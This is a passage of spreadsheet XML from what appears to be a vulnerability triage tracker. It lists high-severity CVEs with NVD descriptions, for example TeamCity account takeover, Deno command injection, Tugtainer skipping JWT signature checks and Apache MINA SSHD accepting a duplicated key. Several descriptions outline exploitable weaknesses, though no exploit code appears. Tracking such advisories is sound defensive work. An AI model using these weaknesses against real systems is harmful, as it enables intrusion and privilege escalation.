          <t>HIGH</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="inlineStr"/>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr"/>
      <c r="K124" s="5" t="inlineStr"/>
      <c r="L124" s="5" t="inlineStr"/>
      <c r="M124" s="5" t="inlineStr"/>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q124" s="5" t="inlineStr"/>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S124" s="5" t="inlineStr">
        <is>
          <t>Subscriber Broken Access Control in MakeCommerce for WooCommerce &lt;= 4.1.0 versions.</t>
        </is>
      </c>
      <c r="T124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96817</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100255</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="inlineStr"/>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr"/>
      <c r="K125" s="5" t="inlineStr"/>
      <c r="L125" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q125" s="5" t="inlineStr"/>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>CWE-1289</t>
        </is>
      </c>
      <c r="S125" s="5" t="inlineStr">
        <is>
          <t>In JetBrains TeamCity before 2026.2, 
2026.1.4, 
2025.11.8 administrator account takeover was possible via password reset</t>
        </is>
      </c>
      <c r="T125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100255</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102101</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="inlineStr"/>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K126" s="5" t="inlineStr"/>
      <c r="L126" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q126" s="5" t="inlineStr"/>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S126" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core before version 9.5.0 is vulnerable to Deserialization of Untrusted Data. A deserialization weakness in Kiteworks Core could, under certain conditions, allow crafted data to be deserialized unsafely, potentially resulting in remote code execution on the appliance. Exploitation depends on an attacker first being able to influence the affected data, so this issue is not exploitable on its own.</t>
        </is>
      </c>
      <c r="T126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102101</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102126</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="inlineStr"/>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr"/>
      <c r="K127" s="5" t="inlineStr"/>
      <c r="L127" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q127" s="5" t="inlineStr"/>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S127" s="5" t="inlineStr">
        <is>
          <t>A stored cross-site scripting (XSS) weakness in Kiteworks Core could allow an administrator holding only a single, narrowly scoped delegated permission to store crafted content that later executes arbitrary JavaScript in the authenticated session of a System Administrator who views the affected page. This could have permitted the lower-privileged administrator to escalate to full administrative control of the tenant, including the creation of a new administrative account.</t>
        </is>
      </c>
      <c r="T127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102126</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103432</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="inlineStr"/>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr"/>
      <c r="K128" s="5" t="inlineStr"/>
      <c r="L128" s="5" t="inlineStr"/>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q128" s="5" t="inlineStr"/>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S128" s="5" t="inlineStr">
        <is>
          <t>apcupsd through 3.14.14 has an sscanf stack-based buffer overflow in getupsvar() in src/cgi/upsfetch.c (used by upsstats.cgi, multimon.cgi, and upsfstats.cgi), a related issue to CVE-2026-15544.</t>
        </is>
      </c>
      <c r="T128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103432</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103473</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="inlineStr"/>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K129" s="5" t="inlineStr"/>
      <c r="L129" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q129" s="5" t="inlineStr"/>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S129" s="5" t="inlineStr">
        <is>
          <t>Deno versions 2.7.0 through 2.9.7 on Windows contain a command injection vulnerability in node:child_process where shell arguments are escaped for the wrong shell type. Attackers can inject OS commands by passing untrusted arguments with the shell option, allowing arbitrary command execution with Deno process privileges.</t>
        </is>
      </c>
      <c r="T129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103473</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51568</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="inlineStr"/>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr"/>
      <c r="K130" s="5" t="inlineStr"/>
      <c r="L130" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q130" s="5" t="inlineStr"/>
      <c r="R130" s="5" t="inlineStr"/>
      <c r="S130" s="5" t="inlineStr">
        <is>
          <t>modelscope Agentscope v1.0.18-v1.0.0 is vulnerable to Path Traversal in write_text_file.</t>
        </is>
      </c>
      <c r="T130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51568</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51570</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="inlineStr"/>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr"/>
      <c r="K131" s="5" t="inlineStr"/>
      <c r="L131" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q131" s="5" t="inlineStr"/>
      <c r="R131" s="5" t="inlineStr"/>
      <c r="S131" s="5" t="inlineStr">
        <is>
          <t>modelscope Agentscope v1.0.0-v1.0.8 is vulnerable to Path Traversal in insert_text_file.</t>
        </is>
      </c>
      <c r="T131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51570</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87004</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="inlineStr"/>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr">
        <is>
          <t>docker, gin</t>
        </is>
      </c>
      <c r="K132" s="5" t="inlineStr"/>
      <c r="L132" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q132" s="5" t="inlineStr"/>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S132" s="5" t="inlineStr">
        <is>
          <t>Tugtainer is a self-hosted app for automating updates of Docker containers. Prior to version 1.31.3, when the OIDC login flow completes, backend/modules/auth/providers/auth_oidc_provider.py decodes the id_token returned by the identity provider's token endpoint using jose.jwt.get_unverified_claims() instead of jwt.decode(). This skips signature verification, audience (aud) validation, issuer (iss) validation, and expiry (exp) checking entirely. The extracted claims (email/sub/preferred_username) are then used directly as the user_id for the resulting Tugtainer session. This issue has been patched in version 1.31.3.</t>
        </is>
      </c>
      <c r="T132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87004</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93994</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="inlineStr"/>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr">
        <is>
          <t>openssh</t>
        </is>
      </c>
      <c r="K133" s="5" t="inlineStr"/>
      <c r="L133" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q133" s="5" t="inlineStr"/>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>CWE-304</t>
        </is>
      </c>
      <c r="S133" s="5" t="inlineStr">
        <is>
          <t>Apache MINA SSHD is a Java library for client-side and server-side SSH. SSH servers can be configured to require multi-authentication schemes, for instance two different public keys, not just one. In OpenSSH, this would be done by setting in sshd_config AuthenticationMethods "publickey,publickey". Apache MINA SSHD provides an equivalent configuration mechanism.
In Apache MINA SSHD versions up to 2.19.0 and 3.0.0-M1 to 3.0.0-M5 the server code in component sshd-core does not enforce that the two public keys presented are different. A user can thus successfully authenticate with only one of the two key pairs required by presenting this single key twice. This is a partial authentication bypass.
Users are recommended to upgrade to version 2.20.0 or 3.0.0-M6, which fix this issue.</t>
        </is>
      </c>
      <c r="T133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93994</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100256</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="inlineStr"/>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K134" s="5" t="inlineStr"/>
      <c r="L134" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q134" s="5" t="inlineStr"/>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="S134" s="5" t="inlineStr">
        <is>
          <t>In JetBrains IntelliJ IDEA before 2026.2.3 rCE via Structural Search script constraints was possible in untrusted projects</t>
        </is>
      </c>
      <c r="T134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100256</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101885</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="inlineStr"/>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K135" s="5" t="inlineStr"/>
      <c r="L135" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q135" s="5" t="inlineStr"/>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S135" s="5" t="inlineStr">
        <is>
          <t>ZeroClaw versions before 0.8.5 built with plugins-wasm feature contain a path traversal vulnerability in plugin installation that fails to validate the wasm_path manifest field. Attackers can convince users to install crafted plugins that write arbitrary files to paths outside the plugins directory, such as shell startup files, enabling code execution.</t>
        </is>
      </c>
      <c r="T135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101885</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102112</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="inlineStr"/>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr"/>
      <c r="K136" s="5" t="inlineStr"/>
      <c r="L136" s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q136" s="5" t="inlineStr"/>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-78</t>
        </is>
      </c>
      <c r="S136" s="5" t="inlineStr">
        <is>
          <t>A privilege escalation vulnerability in Kiteworks could allow an attacker who has already obtained code execution as an unprivileged backend service account on the appliance to escalate to root and run arbitrary commands with the highest privileges. Exploitation requires existing local access to that service account.</t>
        </is>
      </c>
      <c r="T136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102112</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102113</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="inlineStr"/>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr"/>
      <c r="K137" s="5" t="inlineStr"/>
      <c r="L137" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q137" s="5" t="inlineStr"/>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-59</t>
        </is>
      </c>
      <c r="S137" s="5" t="inlineStr">
        <is>
          <t>A privilege escalation vulnerability in Kiteworks could allow an attacker who has already obtained code execution as an unprivileged backend service account on the appliance to escalate to root. A privileged routine did not safely handle a filesystem path that the lower-privileged account could influence, allowing the attacker to cause a root-owned operation to run arbitrary commands with the highest privileges. Exploitation requires existing local access to that service account.</t>
        </is>
      </c>
      <c r="T137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102113</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102118</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="inlineStr"/>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr"/>
      <c r="K138" s="5" t="inlineStr"/>
      <c r="L138" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q138" s="5" t="inlineStr"/>
      <c r="R138" s="5" t="inlineStr">
        <is>
          <t>CWE-250, CWE-59</t>
        </is>
      </c>
      <c r="S138" s="5" t="inlineStr">
        <is>
          <t>A local privilege escalation vulnerability in Kiteworks could have allowed an attacker with an existing shell under a low-privileged service account to escalate to root privileges on the appliance.</t>
        </is>
      </c>
      <c r="T138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102118</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47489</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="inlineStr"/>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr"/>
      <c r="K139" s="5" t="inlineStr"/>
      <c r="L139" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q139" s="5" t="inlineStr"/>
      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>CWE-281</t>
        </is>
      </c>
      <c r="S139" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where permissions on read-only memory might not be preserved. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47489</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47491</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="inlineStr"/>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr"/>
      <c r="K140" s="5" t="inlineStr"/>
      <c r="L140" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q140" s="5" t="inlineStr"/>
      <c r="R140" s="5" t="inlineStr">
        <is>
